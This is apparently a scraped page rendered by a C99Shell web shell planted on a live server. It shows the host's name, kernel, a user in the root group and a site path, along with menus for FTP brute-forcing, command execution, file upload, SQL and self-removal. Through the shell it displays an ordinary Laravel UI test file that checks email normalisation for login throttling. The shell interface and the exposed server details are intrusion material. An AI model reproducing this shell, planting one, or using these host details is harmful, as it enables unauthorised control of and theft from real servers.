!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smab.picotech.app/public_html/vendor/laravel/ui/tests/AuthBackend/   drwxr-xr-x
Free 25.27 GB of 117.98 GB (21.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ThrottleLoginsTest.php (1.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Ui\Tests\AuthBackend;

use 
Illuminate\Foundation\Auth\ThrottlesLogins;
use 
Orchestra\Testbench\TestCase;
use 
Illuminate\Http\Request;
use 
PHPUnit\Framework\MockObject\MockObject;

class 
ThrottleLoginsTest extends TestCase
{
    
/**
     * @test
     * @dataProvider emailProvider
     */
    
public function it_can_generate_throttle_key(string $emailstring $expectedEmail): void
    
{
        
$throttle $this->getMockForTrait(ThrottlesLogins::class, [], ''truetruetrue, ['username']);
        
$throttle->method('username')->willReturn('email');
        
$reflection = new \ReflectionClass($throttle);
        
$method $reflection->getMethod('throttleKey');
        
$method->setAccessible(true);

        
$request $this->mock(Request::class);
        
$request->expects('input')->with('email')->andReturn($email);
        
$request->expects('ip')->andReturn('192.168.0.1');

        
$this->assertSame($expectedEmail '|192.168.0.1'$method->invoke($throttle$request));
    }

    public function 
emailProvider(): array
    {
        return [
            
'lowercase special characters' => ['ⓣⓔⓢⓣ@ⓛⓐⓡⓐⓥⓔⓛ.ⓒⓞⓜ''test@laravel.com'],
            
'uppercase special characters' => ['ⓉⒺⓈⓉ@ⓁⒶⓇⒶⓋⒺⓁ.ⒸⓄⓂ''test@laravel.com'],
            
'special character numbers' =>['test⑩⓸③@laravel.com''test1043@laravel.com'],
            
'default email' => ['test@laravel.com''test@laravel.com'],
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--